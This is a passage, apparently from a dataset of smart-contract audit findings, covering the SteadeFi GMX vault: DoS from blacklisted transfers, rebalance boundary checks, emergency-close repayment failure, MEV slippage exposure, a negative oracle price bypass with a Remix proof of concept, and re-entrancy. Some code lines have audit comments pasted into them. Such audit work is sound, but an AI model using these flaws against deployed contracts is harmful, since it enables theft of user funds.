status and all users experience a DoS\\nHere are the code snippets of these dangerous transfers inside process functions:\\n```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n\\n```\\nfunction processDepositFailureLiquidityWithdrawal(\\n GMXTypes.Store storage self\\n) public {\\n GMXChecks.beforeProcessAfterDepositFailureLiquidityWithdrawal(self);\\n // rest of code\\n // Refund user the rest of the remaining withdrawn LP assets\\n // Will be in tokenA/tokenB only; so if user deposited LP tokens\\n // they will still be refunded in tokenA/tokenB\\n self.tokenA.safeTransfer(self.depositCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.depositCache.user, self.tokenB.balanceOf(address(this)));\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n}\\n```\\n\\n```\\nfunction processWithdraw(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessWithdrawChecks(self);\\n\\n try GMXProcessWithdraw.processWithdraw(self) {\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n // rest of code\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n \\n // rest of code\\n\\n self.status = GMXTypes.Status.Open;\\n }\\n // rest of code\\n}\\n```\\nчInstead of transferring the ERC-20 tokens directly to a user in the process functions, use a two-step process instead. For example, create another contract whose only purpose is to hold assets and store the information about which address is allowed to withdraw how many of the specified tokens. In the process functions, send the funds to this new contract along with this information instead. So if a user has been blacklisted, the DoS only exists for that specific user and for the rest of the users the system continues to function normally.чDoS of the entire strategy vault, as the status can no longer be updated to Open until the user is no longer blacklisted. This can potentially take forever and forces the owners to take emergency action.ч```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n -Rebalance may occur due to wrong requirements checkчlowчBefore a rebalance can occur, checks are implemented to ensure that `delta` and `debtRatio` remain within their specified limits. However, it's important to note that the check in `GMXChecks::beforeRebalanceChecks` ignores the scenario where these values are equal to any of their limits.\\nIn the current implementation of the `GMXRebalance::rebalanceAdd` function, it first calculates the current values of `debtRatio` and `delta` before making any changes. Subsequently, the `beforeRebalanceChecks` function, checks if these values meet the requirements for a rebalance to occur. These requirements now dictate that both `debtRatio` and `delta` must be either ≥ to the `UpperLimit`, or ≤ to the `LowerLimit` for a rebalance to take place.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n\\nSuppose a rebalance is successful. In the `afterRebalanceChecks` section, the code verifies whether both `delta` and `debtRatio` are greater than the `UpperLimit` or less than the `LowerLimit`. This confirmation implies that these limits are indeed inclusive, meaning that the correct interpretation of these limits should be that `LowerLimit` ≤ actualValue ≤ `UpperLimit`. On the other hand, this also indicates that for a rebalancing to occur, the values of `deltaBefore` and `debtRatioBefore` need to be outside their limits, i.e., `delta` should be greater than `Upper` or less than `Lower`. However, in the current implementation, if these values are equal to the limit, a rebalance may still occur, which violates the consistency of the `afterRebalanceChecks` function, thus indicating that these limits are inclusive. Consequently, a value equal to the limit needs to be treated as valid and not be able to trigger a rebalance.\\n```\\nfunction afterRebalanceChecks(\\n GMXTypes.Store storage self\\n) external view {\\n // Guards: check that delta is within limits for Neutral strategy\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n int256 _delta = GMXReader.delta(self);\\n\\n if (\\n _delta > self.deltaUpperLimit ||\\n _delta < self.deltaLowerLimit\\n ) revert Errors.InvalidDelta();\\n }\\n\\n // Guards: check that debt is within limits for Long/Neutral strategy\\n uint256 _debtRatio = GMXReader.debtRatio(self);\\n\\n if (\\n _debtRatio > self.debtRatioUpperLimit ||\\n _debtRatio < self.debtRatioLowerLimit\\n ) revert Errors.InvalidDebtRatio();\\n}\\n```\\n\\nImagine the case when `delta` or `debtRatio` is equal to any of its limits; a rebalance will occur. However, on the other hand, these values are valid because they are inclusively within the limits.чRebalance may occur due to wrong requirements check\\nConsider a strict check to determine if `delta` or `debtRatio` is strictly within its limits, including scenarios where they are equal to any of its limits. In such cases, the code should ensure that a rebalance does not occur when these values are precisely at the limit.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n ) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore <= self.deltaUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore >= self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore <= self.debtRatioUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore >= self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n }\\n```\\nчIn such a scenario, the system might incorrectly trigger a rebalance of the vault, even when `delta` or `debtRatio` is precisely within the established limits, thus potentially causing unintended rebalancing actions.ч```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n -Wrong errors are used for revertsчlowчThere are checks that revert with wrong errors\\nReverts:\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L68-L69\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L74-L75\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L351-L352\\n```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\nчWrong errors are used for reverts\\nConsider using `Errors.EmptyDepositAmount` for the provided cases.чThis can lead to user confusion as they won't receive the accurate revert reason.ч```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\n -Transfer Limit of UNI Tokens May Lead to a DoS and Token Loss RiskчlowчUsers who accumulate more than 2^96 UNI tokens may lose their tokens because transfers above that will always revert.\\nThe UNI token contract imposes a transfer limit, restricting the maximum amount of tokens that can be transferred in a single transaction to 2^96 UNI tokens. Any transfer exceeding this threshold will trigger a transaction revert. The contract relies on the `balanceOf` function to verify the sender's token balance before proceeding with a transfer.\\n```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n\\nsuch a transfer will always revert for balances above 2^96 UNI tokens\\nhttps://github.com/d-xo/weird-erc20#revert-on-large-approvals--transfersчTransfer Limit of UNI Tokens May Lead to a DoS and Token Loss Risk\\nContracts should always check the amount of UNI being transferred before processing the transaction.чUsers who accumulate more than 2^96 UNI tokens may lose their tokens due to a DOS revert when attempting to withdraw their token balance.ч```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n -`emergencyClose()` may fail to repay any debtчmediumчthe `emergencyClose()` function may become ineffective, preventing the contract from repaying any outstanding debt, leading to potential financial losses.\\nWhen the contract is paused, all the liquidity from GMX is withdrawn (in term of `tokenA` and tokenB).\\nThe `emergencyClose()` function is called after the contract is paused due some reasons, possibly when the strategy incurs bad debts or when the contract gets hacked, High volatility, and so on...\\nThis function is responsible for repaying all the amounts of `tokenA` and `tokenB` borrowed from the `lendingVault` contract. It then sets the contract's status to `closed`. After that, users who hold `svToken` shares can withdraw the remaining assets from the contract.\\nThe issue with this function lies in its assumptions, which are not accurate. It assumes that the withdrawn amounts from GMX are always sufficient to cover the whole debt.\\n```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n\\nPlease note that `_rp.repayTokenAAmt` and `_rp.repayTokenBAmt` represent the entire debt, and these values remain the same even if a swap is needed.\\nThe function checks if a swap is needed to cover its debt, and here's how it determines whether a swap is required:\\n```\\n function calcSwapForRepay(GMXTypes.Store storage self, GMXTypes.RepayParams memory rp)\\n external\\n view\\n returns (bool, address, address, uint256)\\n {\\n address _tokenFrom;\\n address _tokenTo;\\n uint256 _tokenToAmt;\\n if (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n _tokenToAmt = rp.repayTokenAAmt - self.tokenA.balanceOf(address(this));\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else if (rp.repayTokenBAmt > self.tokenB.balanceOf(address(this))) {\\n // If more tokenB is needed for repayment\\n _tokenToAmt = rp.repayTokenBAmt - self.tokenB.balanceOf(address(this));\\n _tokenFrom = address(self.tokenA);\\n _tokenTo = address(self.tokenB);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else {\\n // If there is enough to repay both tokens\\n return (false, address(0), address(0), 0);\\n }\\n }\\n```\\n\\nIn plain English, this function in this case assumes: if the contract's balance of one of the tokens (e.g., tokenA) is insufficient to cover `tokenA` debt, it means that the contract balance of the other token (tokenB) should be greater than the debt of `tokenB`, and the value of the remaining balance of `tokenB` after paying off the `tokenB` debt should be equal or greater than the required value to cover the debt of `tokenA`\\nThe two main issues with this assumption are:\\nIf the contract balance of `tokenFrom` is not enough to be swapped for `_tokenToAmt` of `tokenTo`, the swap will revert, causing the function to revert each time it is called when the balance of `tokenFrom` is insufficient.(in most cases in delta long strategy since it's only borrow one token), This is highly likely since emergency closures occur when something detrimental has happened, (such as bad debts).\\nThe second issue arises when the balance of tokenFrom(EX: tokenA) becomes less than `_rp.repayTokenAAmt` after a swap. In this case, the `repay` call will revert when the `lendingVault` contract attempts to `transferFrom` the strategy contract for an amount greater than its balance. ex :\\n`tokenA` balance = 100, debtA = 80.\\ntokenB balance = 50 , debtB = 70.\\nafter swap `tokenA` for 20 tokenB .\\n`tokenA` balance = 75 , debtA = 80 : in this case `repay` will keep revert .\\nso if the contract accumulates bad debts(in value), the `emergencyClose()` function will always revert, preventing any debt repayment.\\nAnother critical factor to consider is the time between the `pause` action and the emergency `close` action. During periods of high volatility, the `pause` action temporarily halts the contract, but the prices of the two assets may continue to decline. The emergency `close` function can only be triggered by the owner, who operates a time-lock wallet. In the time between the `pause` and `close` actions, the prices may drop significantly and this condition will met since the `swap` is needed in almost all cases.чthe debt need to be repayed in the `pause` action. and in case of `resume` just re-borrow again.ч`emergencyClose()` function will consistently fail to repay any debt.\\nlenders may lose all their fundsч```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n -Missing minimum token amounts in the emergency contract functions allows MEV bots to take advantage of the protocols emergency situationчmediumчWhen an emergency situation arises and the protocol pauses or resumes the operation of the vault. All funds of the vault are removed from GMX or added back to GMX without any protection against slippage. This allows MEV bots to take advantage of the protocol's emergency situation and make huge profits with it.\\nWhen an emergency situation arises the protocol owners can call the emergencyPause function to remove all the liquidity from GMX:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\nBut the minimum tokens amount to get back when removing liquidity is not provided to the RemoveLiquidityParams:\\n```\\nstruct RemoveLiquidityParams {\\n // Amount of lpToken to remove liquidity\\n uint256 lpAmt;\\n // Array of market token in array to swap tokenA to other token in market\\n address[] tokenASwapPath;\\n // Array of market token in array to swap tokenB to other token in market\\n address[] tokenBSwapPath;\\n // Minimum amount of tokenA to receive in token decimals\\n uint256 minTokenAAmt;\\n // Minimum amount of tokenB to receive in token decimals\\n uint256 minTokenBAmt;\\n // Execution fee sent to GMX for removing liquidity\\n uint256 executionFee;\\n}\\n```\\n\\nAs it is not set, the default value 0 (uint256) is used. Therefore, up to 100% slippage is allowed.\\nThe same parameters are also missing when normal operation resumes:\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n}\\n```\\n\\nTherefore, MEV bots could take advantage of the protocol's emergency situation and as these trades include all funds of the vault it could lead to a big loss.\\nIgnoring slippage when pausing could be a design choice of the protocol to avoid the possibility of a revert and pause the system as quickly as possible. However, this argument does not apply during the resume.чImplement a custom minMarketTokens parameter, but do not implement the usual slippage calculation, as this could potentially lead to new critical vulnerabilities. If for example the reason for this emergency situation is a no longer supported chainlink feed, which will lead to reverts and therefore also to DoS of the emergency close / withdraw flow.чBig loss of funds as all funds of the strategy vault are unprotected against MEV bots.ч```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n -A bad price can be delivered in ChainlinkARBOracleчlowчWhen the `consultIn18Decimals()` is called, can be returned a negative value. Because not exist correct validation for negative response.\\nThe `ChainlinkARBOracle.sol` has to garantie delivered correct price. Howerver exist a potencial scenario of this situation may be breaking.\\nLets break each one part of this scenario:\\nWhen `consultIn18Decimals()` is called, and call to `consult()` this function is encharge `of` verifie each answer and delivere a price not old, not zero,non-negative and garantie `of` sequencer is up.\\nPosible scenario in `consult()` for the moment, we have: `chainlinkResponse.answer = x where x > 0` `prevChainlinkResponse.answer = y where y < 0` This is a negative value given by Chainlink\\n`_chainlinkIsFrozen()` is pass correctly\\n`_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)` evaluate the following functions:\\n`_badChainlinkResponse(currentResponse)` pass correctly.\\n`_badChainlinkResponse(prevResponse)` pass also correctly because is only check if the value is zero, but not negative see : `if (response.answer == 0) { return true; }`\\n_badPriceDeviation(currentResponse, prevResponse, token): `if( currentResponse.answer > prevResponse.answer)` remember `currentResponse.answer = x where x > 0 and prevResponse.answer = y where y < 0` So. x > y . This condition is passed successfully..\\nFor the evaluation `of` `_deviation` we have: `_deviation = uint256(currentResponse.answer - prevResponse.answer) * SAFE_MULTIPLIER / uint256(prevResponse.answer); The result will always return zero. So validation on` _badPriceDeviationof_deviation > maxDeviations[token]always returnsfalsebecause zero can never be greater for any number ofmaxDeviations[token]since it only accepts numbers `of` typeuint256 `\\nPOC :\\nThis scenario is illustrated in a minimalist example, which you can use in Remix:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from \"@openzeppelin/contracts/utils/math/SafeCast.sol\";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n \\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal,uint256 _maxDeviation ) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. -3000, -1 \\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n } \\n \\n // You call this function, result is currentResponse but doesn't matter maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n \\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) { \\n\\n if (_badPriceDeviation(currentResponse, prevResponse) )revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse ) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Here is our scene, always result be zero with negative value of _prevResponse\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n\\n\\n}\\n```\\nчThis behavior can be mitigated by setting the correct conditional:\\n```\\nif (response.answer <= 0) { return true; }\\n```\\n\\nAlso,due of only consultIn18Decimals() is the function that is called for the protocol. Visibility to \"consult\" may be restricted. Change from \"public\" to \"internal\".чHigh, the base protocol is how you get the price of the securities. The answer may be different than what is allowed. Because the maximum deviations will not be counted.ч```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from \"@openzeppelin/contracts/utils/math/SafeCast.sol\";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n \\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal,uint256 _maxDeviation ) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. -3000, -1 \\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n } \\n \\n // You call this function, result is currentResponse but doesn't matter maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n \\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) { \\n\\n if (_badPriceDeviation(currentResponse, prevResponse) )revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse ) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Here is our scene, always result be zero with negative value of _prevResponse\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n\\n\\n}\\n```\\n -re-entrency possible on processWithdraw since external call is made before burning user's shares in Vaultчmediumчre-entrency possible on processWithdraw since external call is made before burning user's shares in Vault\\n```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\naudit transfer ETH and call (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}(\"\");\\n require(success, \"Transfer failed.\");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n burn is after self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXWithdraw.sol#L182-L197\\nSince the function is only accessible by keeper (likely a router), which from the example of the mockRouter, would bundle the withdraw and \"afterWithdrawalExecution\" together. However since the router is out-of-scope, and there is still a possible chance that the user can make use of the router to re-enter into the function (without re-entrency lock), and be able to drain more fund that he actually deserves. This is submitted as a medium risk.чburn user's share first, before executing external call at the end.чdrain of user funds.ч```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\naudit transfer ETH and call (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}(\"\");\\n require(success, \"Transfer failed.\");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n burn is after self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n -min max price on getMarketTokenPrice is not utilized such that deposit and withdrawal can use the same price, leading to free tx for cost-free manipulationчmediumчmin max price on getMarketTokenPrice is not utilized such that deposit and withdrawal can use the same price, leading to free tx for cost-free manipulation\\nGMX provides getMarketTokenPrice on its synethicReader which leverages MarketUtils. It allows passing in index/long/short token price with min/max. The isDeposit flag would then be used to determine whether the min or max price would be used for calculating marketTokenPrice, this is important to always favor the protocol and prevent MEV.\\nHowever on the getMarketTokenInfo implemented in GMXOracle, it passes in the same price from the oracle to the min/max price for all long&short/lpToken. This implies the same pricing is used for both deposit and withdrawal, enabling user to freely deposit/withdraw without cost or slippage. Malicious users can use this to trigger rebalance, and hence deposit or withdrawal directly on GMX that benefit the attacker with the use of bundled tx.\\n```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n Price.Props memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n\\nhttps://github.com/gmx-io/gmx-synthetics/blob/613c72003eafe21f8f80ea951efd14e366fe3a31/contracts/reader/Reader.sol#L187-L206чconsider adding a small fee(5bps) to buffer the price returned from `_getTokenPriceMinMaxFormatted` on both sides.чfree deposit and withdrawal due to the same token price is used for min or max price, which leading to the same marketTokenPrice calculation for deposit and withdrawal.ч```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n Price.Props memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 